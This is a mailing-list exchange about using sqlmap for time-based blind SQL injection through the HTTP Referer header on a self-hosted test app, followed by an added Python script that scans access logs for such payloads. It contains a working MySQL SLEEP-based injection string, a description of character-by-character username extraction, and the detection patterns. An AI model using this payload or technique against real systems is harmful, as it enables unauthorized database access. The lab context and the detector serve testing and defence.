Re: [sqlmap-users] sqlmap SQL blind time-based injection (MySQL)
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:26:46
Hi Alton.

Please update to the latest revision and run sqlmap with the: -p referer.

Kind regards,
Miroslav Stampar

On Sun, Oct 7, 2012 at 11:25 PM, Alton Johnson <alt...@gm...> wrote:
> In my situation, my vulnerable parameter is Referer in the HTTP
> headers. I am able to enumerate the username and database name
> manually, but can someone explain or point me to an article that gives
> details about sqlmap and time-based with mysql? Here is an example of
> how I was able to enumerate the name. I'm unsure if there's any
> "custom" way of getting sqlmap to work with this.
>
> Code:
> GET /vulnwebapp/index.php?id=2 HTTP/1.1
> Host: 192.168.127.133
> Proxy-Connection: keep-alive
> User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: en-US,en;q=0.8
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
>
> FYI, I'm testing this on a vulnerable web app hosted by myself. So
> with the above request, the page sleeps because the first character of
> the current username is "r", which eventually allows me to change 1,1
> to 2,1 and so forth until I figure out that the username is "root."
>
> Is there any way to get sqlmap to assist with this type of attack?
>
> Thanks,

--
Miroslav Stampar
http://about.me/stamparm
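Added example, not part of the original thread or of sqlmap: a defender-side check that scans web access logs for Referer values shaped like the one quoted in the message above. It assumes the server writes the Apache/nginx combined log format; the function names and sample log lines are constructed, and BENCHMARK, SUBSTR and MID generalize beyond the SLEEP/IF/SUBSTRING calls shown in the thread.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log layout (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?:[^"\\]|\\.)*"$')
# Delay primitives used for time-based inference; SLEEP is the one in the thread.
TIMING_RE = re.compile(r'\b(?:SLEEP|BENCHMARK)\s*\(', re.I)
# Conditional and string-slicing calls used to test one character at a time.
INFERENCE_RE = re.compile(r'\b(?:IF|SUBSTRING|SUBSTR|MID)\s*\(', re.I)

def classify_referer(value):
    """Return the reasons a Referer value looks like injected SQL (empty if none)."""
    if value in ("", "-"):  # header absent, nothing to judge
        return []
    reasons = []
    try:
        parts = urlsplit(value)
        is_url = parts.scheme in ("http", "https") and bool(parts.netloc)
    except ValueError:  # malformed authority, e.g. an unbalanced '['
        is_url = False
    if not is_url:
        reasons.append("not-a-url")
    if TIMING_RE.search(value):
        reasons.append("sql-delay-function")
    if INFERENCE_RE.search(value):
        reasons.append("sql-conditional")
    return reasons

def scan(lines):
    """Return (client_ip, referer, reasons) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        reasons = classify_referer(m.group("referer")) if m else []
        if reasons:
            hits.append((m.group("ip"), m.group("referer"), reasons))
    return hits

# Constructed sample log lines (not taken from the original thread's server).
SAMPLE_LOG = """\
192.168.127.1 - - [07/Oct/2012:23:20:01 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "http://192.168.127.133/vulnwebapp/" "Mozilla/5.0"
192.168.127.1 - - [07/Oct/2012:23:21:10 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "'+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'" "Mozilla/5.0"
192.168.127.1 - - [07/Oct/2012:23:22:00 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, referer, reasons in scan(SAMPLE_LOG):
        print(ip, reasons, referer)
```

A Referer that is not an absolute http(s) URL is already anomalous on its own, so the "not-a-url" reason is worth alerting on even when no SQL keyword matches.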